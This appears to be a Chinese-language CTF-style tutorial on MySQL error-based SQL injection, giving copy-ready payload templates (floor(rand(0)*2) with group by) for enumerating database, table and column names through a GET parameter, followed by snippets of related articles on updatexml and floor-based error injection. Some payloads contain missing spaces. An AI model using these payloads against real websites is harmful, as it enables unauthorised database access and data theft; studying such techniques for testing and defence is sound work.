乙個帶get引數的**並且不從資料庫返回資料,但存在報錯資訊
檢視字段情況:
報錯注入語句格式:
' and 1=2 union select1,2,3 from(select+count(*),concat(floor(rand(0)*2),(sql語句))a from information_schema.tables group by a)b%23
注:其中1,2,3為存在的字段數
sql語句處為要輸入的sql注入語句
檢視當前資料庫賬號的許可權:
爆庫名:
' and 1=2 union select 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(
select schema_name from information_schema.schemata limit 5,1
))a from information_schema.tables group by a)b%23
注:limit x,1 中x表示要查詢的第x個資料庫名,從0開始算起
爆表名:
' and 1=2 unionselect 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(
select table_name from information_schema.tables where table_schema=database() limit0,1
))a from information_schema.tables group by a)b%23
注:database() 表示使用當前資料庫,如果要跨庫查詢,將庫名十六進製制編碼後填入其中,如:table_schema=0x111111111;
limit 0,1 表示查詢第乙個表名,修改0查詢其他;
爆欄位:
' and 1=2 union select 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(
select column_name from information_schema.columns where table_schema=database() and table_name=0x11111111limit 2,1
))a from information_schema.tables group by a)b%23
注:0x11111111 為要查詢的表名的十六進製制
limit 2,1 為要查詢的第2個字段
爆pwd:
拿到最終的key
SQL注入 報錯注入
sql注入基礎 盲注 用於注入結果無回顯但錯誤資訊有輸出的情況 floor函式 返回小於等於某值的整數,例如floor 1 則返回1,floor 1.9 也返回1 rand函式 生成隨機數.可指定seed,指定後每次生成的數都一樣即偽隨機,不指定seed則每次生成的隨機數都不一樣.通過floor和r...
SQL注入 報錯注入
利用 mysql select 1 from select count concat version floor rand 0 2 x from information schema.tables group by x a error 1062 23000 duplicate entry 5.1.4...
SQL 注入 報錯注入
報錯注入的三種格式 第一種 updatexml 修改格式函式 修改格式不符合 報錯 函式解釋 updatexml xml document,xpath string,new value 第乙個引數 xml document是string格式,第二個引數 xpath string xpath格式的字串...